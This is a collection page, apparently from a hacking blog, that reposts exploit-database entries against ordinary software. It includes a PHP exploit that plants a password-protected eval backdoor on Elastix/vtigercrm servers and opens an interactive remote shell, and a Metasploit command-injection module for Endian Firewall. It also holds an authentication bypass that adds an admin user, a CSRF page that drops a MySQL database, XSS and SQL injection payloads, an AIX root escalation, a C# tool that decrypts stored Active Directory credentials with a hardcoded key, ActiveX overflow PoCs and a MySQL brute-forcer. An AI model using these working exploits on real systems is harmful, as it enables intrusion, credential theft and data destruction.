<?
echo "\n+-------------------------------------------+\n";
echo "| Elastix <= 2.4 |\n";
echo "| PHP Code Injection Exploit |\n";
echo "| By i-Hmx |\n";
echo "| sec4ever.com |\n";
echo "| n0p1337@gmail.com |\n";
echo "+-------------------------------------------+\n";
echo "\n| Enter Target [https://ip] # ";
$target=trim(fgets(STDIN));
$inj='<?eval(base64_decode("JGY9Zm9wZW4oJ2ZhcnNhd3kucGhwJywndysnKTskZGF0YT0nPD8gaWYoISRfUE9TVFtwd2RdKXtleGl0KCk7fSBlY2hvICJGYXJpcyBvbiB0aGUgbWljIDpEPGJyPi0tLS0tLS0tLS0tLS0tLS0tIjtAZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtmYV0pKTtlY2hvICItLS0tLS0tLS0tLS0tLS0tLSI7ID8+Jztmd3JpdGUoJGYsJGRhdGEpO2VjaG8gImRvbmUiOwo="));
?>';
$faf=fopen("fa.txt","w+");
fwrite($faf,$inj);
fclose($faf);
$myf='fa.txt';
$url =
$target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../modules/Import/ImportStep2.php%00";
// URL
$reffer = "http://1337s.cc/index.php";
$agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4)
Gecko/20030624 Netscape/7.1 (ax)";
$cookie_file_path = "/";
echo "| Injecting 1st payload\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,array("userfile"=>"@".realpath($myf)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_REFERER, $reffer);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$result = curl_exec($ch);
curl_close($ch);
//echo $result;
echo "| Injecting 2nd payload\n";
function faget($url,$post){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
curl_setopt($curl, CURLOPT_HEADER, true);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
function kastr($string, $start, $end){
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}
$me=faget($target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../cache/import/IMPORT_%00","");
echo "| Testing total payload\n";
$total=faget($target."/vtigercrm/farsawy.php","pwd=1337");
if(!eregi("Faris on the mic :D",$total))
{
die("[+] Exploitation Failed\n");
}
echo "| Sending CMD test package\n";
$cmd=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=cGFzc3RocnUoJ2VjaG8gZmFyc2F3eScpOw==");
if(!eregi("farsawy",$cmd))
{
echo " + Cmd couldn't executed but we can evaluate php code\n + use :
$target//vtigercrm/fa.php\n Post : fa=base64code\n";
}
echo "| sec4ever shell online ;)\n\n";
$host=str_replace('https://','',$target);
while(1){
echo "i-Hmx@$host# ";
$c=trim(fgets(STDIN));
if($c=='exit'){die("[+] Terminating\n");}
$payload=base64_encode("passthru('$c');");
$fuck=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=$payload");
$done=kastr($fuck,"-----------------","-----------------");
echo "$done\n";
}
/*
I dont even remember when i exploited this shit!
maybe on 2013?!
whatever , Hope its not sold as 0day in the near future xDD
*/
?>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863157937
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Endian Firewall Proxy Password Change Command Injection',
'Description' => %q{
This module exploits an OS command injection vulnerability in a
web-accessible CGI script used to change passwords for locally-defined
proxy user accounts. Valid credentials for such an account are
required.
Command execution will be in the context of the "nobody" account, but
this account had broad sudo permissions, including to run the script
/usr/local/bin/chrootpasswd (which changes the password for the Linux
root account on the system to the value specified by console input
once it is executed).
The password for the proxy user account specified will *not* be
changed by the use of this module, as long as the target system is
vulnerable to the exploit.
Very early versions of Endian Firewall (e.g. 1.1 RC5) require
HTTP basic auth credentials as well to exploit this vulnerability.
Use the USERNAME and PASSWORD advanced options to specify these values
if required.
Versions >= 3.0.0 still contain the vulnerable code, but it appears to
never be executed due to a bug in the vulnerable CGI script which also
prevents normal use (http://jira.endian.com/browse/UTM-1002).
Versions 2.3.x and 2.4.0 are not vulnerable because of a similar bug
(http://bugs.endian.com/print_bug_page.php?bug_id=3083).
Tested successfully against the following versions of EFW Community:
1.1 RC5, 2.0, 2.1, 2.2, 2.5.1, 2.5.2.
Should function against any version from 1.1 RC5 to 2.2.x, as well as
2.4.1 and 2.5.x.
},
'Author' => [
'Ben Lincoln' # Vulnerability discovery, exploit, Metasploit module
],
'References' => [
['CVE', '2015-5082'],
['URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082'],
['EDB', '37426'],
['EDB', '37428']
],
'Privileged' => false,
'Platform' => %w{ linux },
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d",
'DisableNops' => true,
'Space' => 2048
},
'Targets' =>
[
[ 'Linux x86',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => [ :echo, :printf ]
}
],
[ 'Linux x86_64',
{
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => [ :echo, :printf ]
}
]
],
'DefaultOptions' =>
{
'SSL' => true,
'RPORT' => 10443
},
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 28 2015',
'License' => MSF_LICENSE
))
register_options([
OptString.new('TARGETURI', [true, 'Path to chpasswd.cgi CGI script',
'/cgi-bin/chpasswd.cgi']),
OptString.new('EFW_USERNAME', [true,
'Valid proxy account username for the target system']),
OptString.new('EFW_PASSWORD', [true,
'Valid password for the proxy user account']),
OptString.new('RPATH', [true,
'Target PATH for binaries used by the CmdStager', '/bin'])
], self.class)
register_advanced_options(
[
OptInt.new('HTTPClientTimeout', [ true, 'HTTP read response timeout (seconds)', 5])
], self.class)
end
def exploit
# Cannot use generic/shell_reverse_tcp inside an elf
# Checking before proceeds
if generate_payload_exe.blank?
fail_with(Failure::BadConfig,
"#{peer} - Failed to store payload inside executable, " +
"please select a native payload")
end
execute_cmdstager(:linemax => 200, :nodelete => true)
end
def execute_command(cmd, opts)
cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
req(cmd)
end
def req(cmd)
sploit = "#{datastore['EFW_PASSWORD']}; #{cmd};"
post_data = Rex::MIME::Message.new
post_data.add_part('change', nil, nil, 'form-data; name="ACTION"')
post_data.add_part(datastore['EFW_USERNAME'], nil, nil, 'form-data; name="USERNAME"')
post_data.add_part(datastore['EFW_PASSWORD'], nil, nil, 'form-data; name="OLD_PASSWORD"')
post_data.add_part(sploit, nil, nil, 'form-data; name="NEW_PASSWORD_1"')
post_data.add_part(sploit, nil, nil, 'form-data; name="NEW_PASSWORD_2"')
post_data.add_part(' Change password', nil, nil, 'form-data; name="SUBMIT"')
data = post_data.to_s
boundary = post_data.bound
referer_url =
"https://#{datastore['RHOST']}:#{datastore['RPORT']}" +
"#{datastore['TARGETURI']}"
res = send_request_cgi(
{
'method' => 'POST',
'uri' => datastore['TARGETURI'],
'ctype' => "multipart/form-data; boundary=#{boundary}",
'headers' => {
'Referer' => referer_url
},
'data' => data
})
if res
if res.code == 401
fail_with(Failure::NoAccess,
"#{rhost}:#{rport} - Received a 401 HTTP response - " +
"specify web admin credentials using the USERNAME " +
"and PASSWORD advanced options to target this host.")
end
if res.code == 404
fail_with(Failure::Unreachable,
"#{rhost}:#{rport} - Received a 404 HTTP response - " +
"your TARGETURI value is most likely not correct")
end
end
end
end
NETGEAR Wireless Management System - Authentication Bypass and
Privilege Escalation.
WMS5316 ProSafe 16AP Wireless Management System - Firmware 2.1.4.15
(Build 1236).
[-] Vulnerability Information:
==============================
Title: NETGEAR Wireless Management System - Authentication Bypass and
Privilege Escalation
CVE: Not assigned
Vendor: NETGEAR
Product: WMS5316 ProSafe 16AP Wireless Management System
Affected Version: Firmware 2.1.4.15 (Build 1236)
Fixed Version: Not publicly available
[-] Disclosure Timeline:
========================
22/04/2015
Vulnerability identified by Reinforce Services
23/04/2015
Support case created with NETGEAR.
24/04/2015
Vendor requested further information.
27/04/2015
Issue escalated within NETGEAR.
30/04/2015
Issue confirmed by vendor.
18/05/2015
Vendor confirmed issue present in other controllers (details unknown)
Beta update for WMS5316 expected first week of June.
06/25/2015
Vendor releases firmware version 2.1.5 that now contains a fix.
http://downloadcenter.netgear.com/en/product/WMS5316#
http://kb.netgear.com/app/answers/detail/a_id/29339
(Note: This has not been tested to confirm the issue is resolved)
[-] Proof of Concept:
=================
wget --keep-session-cookies --save-cookies=cookies.txt
--post-data="reqMethod=auth_user&jsonData=%7B%22user_name%22%3A%20%22ANYTHING%22%2C%20%22password%22%3A%20%22&%22%7D"
http://192.168.1.2/login_handler.php && wget
--load-cookies=cookies.txt
--post-data="reqMethod=add_user&jsonData=%7B%22user_name%22%3A%20%22newusername%22%2C%20%22password%22%3A%20%22newpassword%22%2C%20%22re_password%22%3A%20%22newpassword%22%2C%20%22type%22%3A%20%222%22%7D"
http://192.168.1.2/request_handler.php
[-] Vulnerability Details:
==========================
The process to bypass authentication and escalate privileges is as follows:
One:
Include the "&" symbol anywhere in the password value in the login
request (as raw content - it must not be encoded).
Two:
After a moment, the system will accept those credentials and grant
access to the GUI. The account appears somewhat restricted - but this
is only client side.
Three:
Send a request to add a new administrative user.
Four:
The new admin account is then available for use as created above.
Note: As an alternative, it is trivial to modify the Java code on it's
way down to a browser to enable all of the admin functions rather than
creating a new user.
This worked as well - so it's not strictly necessary to create a new
user; the bypass 'user' has full admin access if needed (leaving less
indicators of compromise)
[-] Credits:
============
Vulnerability discovered by Elliott Lewis of Reinforce Services
[-] Copyright:
==============
Copyright (c) Reinforce Services Limited 2015, All rights reserved
worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered
in any way without the express written consent of Reinforce Services
Limited.
[-] Disclaimer:
===============
The information herein contained may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties, implied or otherwise, with regard to this
information or its use. Any use of this information is at the user's
risk. In no event shall the author/distributor (Reinforce Services
Limited) be held liable for any damages whatsoever arising out of or
in connection with the use or spread of this information.
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-JSPMYSQLADMINISTRADOR-0904.txt
Vendor:
================================
JSPMySQL Administrador
https://sites.google.com/site/mfpledon/producao-de-software
Product:
================================
JSPMySQL Administrador v.1 is a remote administration of MySQL databases
that are on a Web server using JSP technology
Vulnerability Type:
===================
CSRF & XSS
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
1) No CSRF token exists allowing remote attackers to run arbitrary SQL
commands
on the MySQL database.
2) XSS entry point exists on the listaBD2.jsp web page opening up the
application
for client side browser code execution.
In either case get victim to visit our malicious webpage or click on our
malicious linx then KABOOOOOOOOOOOOOOOOOOOOOOM!!!
Exploit code(s):
===============
1- CSRF to drop the default MySQL database on the remote server:
----------------------------------------------------------------
<!DOCTYPE>
<html>
<head>
<title>JSP-MYSQL-ADMIN-CSRF</title>
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
<!-- CSRF DROP MYSQL DATABASE -->
<form id="HELL" action="http://localhost:8081/sys/sys/listaBD2.jsp"
method="post">
<input type="text" name="cmd" value="DROP DATABASE mysql"/>
<input type="text" name="btncmd" value="Enviar" />
<input type="text" name="bd" value="mysql" />
</form>
2- XSS client side code execution delivered to the victim:
----------------------------------------------------------
http://localhost:8081/sys/sys/listaBD2.jsp?bd=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E
Disclosure Timeline:
=========================================================
Vendor Notification: August 31, 2015
September 4, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST & GET
Vulnerable Product: [+] JSPMySQL Administrador v.1
Vulnerable Parameter(s): [+] cmd, bd
Affected Area(s): [+] listaBD2.jsp
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
source: https://www.securityfocus.com/bid/56774/info
Multiple Fortinet FortiWeb Appliances are prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
The following FortiWeb application series are vulnerable:
FortiWeb-4000C
FortiWeb-3000C/3000CFsx
FortiWeb-1000C
FortiWeb-400C and
FortiWeb Virtual Appliance
https://www.example.com/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
https://www.example.com/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0
source: https://www.securityfocus.com/bid/56767/info
TinyMCPUK is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
TinyMCPUK 0.3 is vulnerable; other versions may also be affected.
http://www.example.com/filemanager/connectors/php/connector.php?test=<h1>p0c</h1>&xss=<script>alert(document.cookie)</script>
source: https://www.securityfocus.com/bid/56777/info
The Zingiri Forums plugin for WordPress is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.
http://www.example.com/wp-content/plugins/zingiri-forum/mybb/memberlist.php?language=[Directory or file]
source: https://www.securityfocus.com/bid/56792/info
The Nest theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/themes/nest/gerador_galeria.php?codigo=[Sqli]
source: https://www.securityfocus.com/bid/56800/info
Newscoop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Newscoop 4.0.2 is vulnerable; other versions may also be affected.
Script: /admin/password_recovery.php
Payload: f_post_sent=1&f_email=example@example.com' and (select if(substr(password_reset_token,15,1)='1',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password
# Exploit Title: Wordpress White-Label Framework XSS
# Google Dork: inurl:/wp-content/themes/whitelabel-framework/inc/form-sharebymail_iframe.php
# Date: 7 September 2015
# Exploit Author: Outlasted
# Software Link: wordpress.com / http://whitelabelframework.com/
# Version: 2.0.6
#Greetz to: TeaMp0isoN
=====================================================
Vulnerable url: /wp-content/themes/whitelabel-framework/inc/form-sharebymail_iframe.php
=====================================================
How to exploit?
----------------------------------------------------------------------------------------------------------
Enter your XSS payload in all forms and watch the magic.
IBM AIX High Availability Cluster Multiprocessing (HACMP) LPE to root 0day
Let's kill some more bugs today and force vendor improvement :)
"""
$ cat /tmp/su
#!/bin/sh
/bin/sh
$ chmod +x /tmp/su
$ PATH=/tmp /usr/es/sbin/cluster/utilities/clpasswd
# /usr/bin/whoami
root
"""
References:
https://en.wikipedia.org/wiki/IBM_High_Availability_Cluster_Multiprocessing
http://www-01.ibm.com/support/knowledgecenter/SSPHQG_6.1.0/com.ibm.hacmp.admngd/ha_admin_clpasswd.htm
--
Kristian Erik Hermansen (@h3rm4ns3c)
https://www.linkedin.com/in/kristianhermansen
--
/*
Cisco Sourcefire User Agent Insecure File Permissions Vulnerability
Vendor: Cisco
Product webpage: http://www.cisco.com
Affected version(s):
Cisco SF User Agent 2.2
Fixed version(s):
Cisco SF User Agent 2.2-25
Date: 08/09/2015
Credits: Glafkos Charalambous
CVE: Not assigned by Cisco
BugId: CSCut44881
Disclosure Timeline:
18-03-2015: Vendor Notification
19-03-2015: Vendor Response/Feedback
01-09-2015: Vendor Fix/Patch
08-09-2015: Public Disclosure
Description:
Sourcefire User Agent monitors Microsoft Active Directory servers and report logins and logoffs authenticated via LDAP.
The FireSIGHT System integrates these records with the information it collects via direct network traffic observation by managed devices.
Vulnerability:
Sourcefire User Agent is vulnerable to default insecure file permissions and hardcoded encryption keys.
A local attacker can exploit this by gaining access to user readable database file and extracting sensitive information.
In combination with hard-coded 3DES keys an attacker is able to decrypt configured Domain Controller accounts which can lead
to further attacks.
C:\Users\0x414141>icacls "C:\SourcefireUserAgent.sdf"
C:\SourcefireUserAgent.sdf BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
Mandatory Label\High Mandatory Level:(I)(NW)
Successfully processed 1 files; Failed processing 0 files
*/
using System;
using System.Text;
using System.Security.Cryptography;
using System.Data.SqlServerCe;
namespace SFDecrypt
{
class Program
{
static void Main(string[] args)
{
SqlCeConnection conn = null;
try
{
string FileName = @"C:\SourcefireUserAgent.sdf";
string ConnectionString = string.Format("DataSource=\"{0}\";Mode = Read Only;Temp Path =C:\\Windows\\Temp", FileName);
conn = new SqlCeConnection(ConnectionString);
string query = "Select host, domain, username, password FROM active_directory_servers";
SqlCeCommand cmd = new SqlCeCommand(query, conn);
conn.Open();
SqlCeDataReader rdr = cmd.ExecuteReader();
while (rdr.Read())
{
string strHost = rdr.GetString(0);
string strDom = rdr.GetString(1);
string strUser = rdr.GetString(2);
string strPass = rdr.GetString(3);
Console.WriteLine("Host: " + strHost + " Domain: " + strDom + " Username: " + strUser + " Password: " + Decrypt.Decrypt3DES(strPass));
}
rdr.Close();
}
catch (Exception exception)
{
Console.Write(exception.ToString());
}
finally
{
conn.Close();
}
}
}
class Decrypt
{
public static string Decrypt3DES(string strEncrypted)
{
string strDecrypted = "";
try
{
TripleDESCryptoServiceProvider provider = new TripleDESCryptoServiceProvider();
provider.Key = Encoding.UTF8.GetBytes("50uR<3F1r3R0xDaH0u5eW0o+");
provider.IV = Encoding.UTF8.GetBytes("53cUri+y");
byte[] inputBuffer = Convert.FromBase64String(strEncrypted);
byte[] bytes = provider.CreateDecryptor().TransformFinalBlock(inputBuffer, 0, inputBuffer.Length);
strDecrypted = Encoding.Unicode.GetString(bytes);
}
catch (Exception exception)
{
Console.Write("Error Decrypting Data: " + exception.Message);
}
return strDecrypted;
}
}
}
References:
https://tools.cisco.com/bugsearch/bug/CSCut44881
Introduction
*********************************************************************************
Using Advantech WebAccess SCADA Software we can remotely manage Industrial
Control systems devices like RTU's, Generators, Motors etc. Attackers can
execute code remotely by passing maliciously crafted string to
ConvToSafeArray API in ASPVCOBJLib.AspDataDriven ActiveX.
Operating System: Windows SP1
Affected Product: Advantech WebAccess 8.0, 3.4.3
Vulnerable Program: AspVCObj.dll
CVE-2014-9208
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
UpdateProject Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:3703BA5D-7329-4E60-A1A5-AE7D6DF267C1' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\webdobj.dll"
prototype = "Sub UpdateProject ( ByVal WwwPort As String , ByVal ProjName
As String , ByVal ProjIP As String , ByVal ProjPort As Long , ByVal
ProjTimeout As Long , ByVal ProjDir As String )"
-->
arg1="defaultV"
arg2="defaultV"
arg3=String(1044, "A")
arg4=1
arg5=1
arg6="defaultV"
target.UpdateProject arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6
</script></html>
</html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
InterfaceFilter Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function InterfaceFilter ( ByVal Interface As String ) As
String"
-->
arg1=String(1044, "A")
target.InterfaceFilter arg1
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
FileProcess Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Sub FileProcess ( ByVal Type As Integer , ByVal FileName As
String )"
-->
arg1=1
arg2=String(1044, "A")
target.FileProcess arg1 ,arg2
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetWideStrCpy Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function GetWideStrCpy ( ByVal Type As Integer , ByVal inStr
As String ) As String"
-->
arg1=1
arg2=String(1044, "A")
target.GetWideStrCpy arg1 ,arg2
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetRecipeInfo Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function GetRecipeInfo ( ByVal Type As Integer , ByVal
filePath As String )"
-->
arg1=1
arg2=String(1044, "A")
target.GetRecipeInfo arg1 ,arg2
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetLastTagNbr Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function GetLastTagNbr ( ByVal TagName As String ) As String"
-->
arg1=String(1044, "A")
target.GetLastTagNbr arg1
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
ConvToSafeArray Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function ConvToSafeArray ( ByVal ArrSize As Integer , ByVal
inStr As String )"
-->
arg1=1
arg2=String(2068, "A")
target.ConvToSafeArray arg1 ,arg2
</script></html>
*********************************************************************************
Vulnerabilities were reported to Advantech sometime in January/February
2015, coordinated through CSOC.From April 2015 they has been postponing the
fix.
source: https://www.securityfocus.com/bid/56837/info
MySQL and MariaDB are prone to a security-bypass weakness.
An attacker may be able to exploit this issue to aid in brute-force attacks; other attacks may also be possible.
use Net::MySQL;
$|=1;
my $mysql = Net::MySQL->new(
hostname => '192.168.2.3',
database => 'test',
user => "user",
password => "secret",
debug => 0,
);
$crackuser = "crackme";
while(<stdin>) {
chomp;
$currentpass = $_;
$vv = join "\0",
$crackuser,
"\x14".
Net::MySQL::Password->scramble(
$currentpass, $mysql->{salt}, $mysql->{client_capabilities}
) . "\0";
if ($mysql->_execute_command("\x11", $vv) ne undef) {
print "[*] Cracked! --> $currentpass\n";
exit;
}
}
---
example session:
C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\jo
hn --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382 time: 0:00:00:02 w/s: 6262 current: citcH
words: 24573 time: 0:00:00:04 w/s: 4916 current: rap
words: 40956 time: 0:00:00:07 w/s: 5498 current: matc3
words: 49147 time: 0:00:00:09 w/s: 5030 current: 4429
words: 65530 time: 0:00:00:12 w/s: 5354 current: ch141
words: 73721 time: 0:00:00:14 w/s: 5021 current: v3n
words: 90104 time: 0:00:00:17 w/s: 5277 current: pun2
[*] Cracked! --> pass
words: 98295 time: 0:00:00:18 w/s: 5434 current: 43gs
Session aborted
source: https://www.securityfocus.com/bid/56860/info
The Simple Gmail Login plugin for Wordpress is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
Simple Gmail Login 1.1.3 and prior are vulnerable.
Fatal error: Uncaught exception 'Exception' with message
'DateTimeZone::__construct() [<a
href='datetimezone.--construct'>datetimezone.--construct</a>]: Unknown or bad timezone ()' in
C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php:229
Stack trace: #0
C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php(229):
DateTimeZone->__construct('') #1
C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php(210):
SimpleGmail_Plugin->log('Plugin activate...', false) #2 [internal
function]: SimpleGmail_Plugin->activate('') #3
C:\xampp\htdocs\wordpress\wp-includes\plugin.php(403):
call_user_func_array(Array, Array) #4
C:\xampp\htdocs\wordpress\wp-admin\plugins.php(157):
do_action('activate_simple...') #5 {main} thrown in C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php
on line 229
=============================================================================
[+] Exploit Title : DirectAdmin Web Control Panel CSRF/XSS vulnerability
[+] Exploit Author : Ashiyane Digital Security Team
[+] Date : 1.483
[+] Version : 2015/09/08
[+] Tested on : Elementary Os
[+] Vendor Homepage : http://www.directadmin.com/
=============================================================================
[+] Introduction :
DirectAdmin is a graphical web-based web hosting control panel designed to make administration of websites easier.
DirectAdmin suffers from cross site request forgery and cross site scripting vulnerabilities
=============================================================================
[+] CMD_FILE_MANAGER :
[+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site
[+] Exploit 1: Create New File and Edit a file
<form name=info action='http://address:port/CMD_FILE_MANAGER' method='POST'>
<input type="hidden" name="action" value="edit">
<input type="hidden" name="path" value="/domains/address/public_html">
<input type="hidden" name="text" value="<?php //codes ?>">
<input type="hidden" name="filename" value="index.php">
<input type="submit" onClick="save=0;" value="Save As">
-----------------------------------------------------------------------------
[+] Exploit 2: Create a New Folder
<form name=folderform action="/CMD_FILE_MANAGER" method="POST">
<input type="hidden name=action value="folder">
<input type="hidden name="path" value="/domains/iceschool.ir/public_html">
<input type="hidden" name="name" value="Folder">
<input type=submit value="Create">
</form>
-----------------------------------------------------------------------------
[+] Exploit 3: Rename a file
<form name=info action='http://address:port/CMD_FILE_MANAGER' method='POST'>
<input type=hidden name=action value="rename">
<input type="hidden" name="path" value="/domains/address/public_html">
<input type="hidden" name="old" value="Oldname">
<input type="hidden" name="filename" value="Newname">
<input type="hidden" name="overwrite" value="yes">
<input type="submit" value="Rename">
</form>
-----------------------------------------------------------------------------
[+] Exploit 4 : Reflected XSS
<form name='info' action='http://address:port/CMD_FILE_MANAGER' method='POST'>
<input type="hidden" name="action" value="edit">
<input type="hidden" name="path" value='/xss/"><script>alert(/XSS Vuln/)</script>'>
<input type="hidden" name="text" value="xss">
<input type="hidden" name="filename" value="xss">
<input type="submit" onClick="save=0;" value="Save As">
</form>
=============================================================================
[+] CMD_FTP :
[+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site
[+] Exploit : Create FTP account
<form name="reseller" action="http://address:port/CMD_FTP" method="post">
<input style="display:none" type="text" name="fakeusernameremembered"/>
<input style="display:none" type="password" name="fakepasswordremembered"/>
<input type="hidden" name="action" value="create">
<input type="hidden" name="domain" value="domain.xyz"> <!-- Example : ashiyane.org -->
<input type="hidden" name="user" value="ehsan">
<input type="hidden" name="passwd" value="pass1234">
<input type="hidden" name="passwd2" value="pass1234">
<input type="hidden" name="type" value="domain" checked>
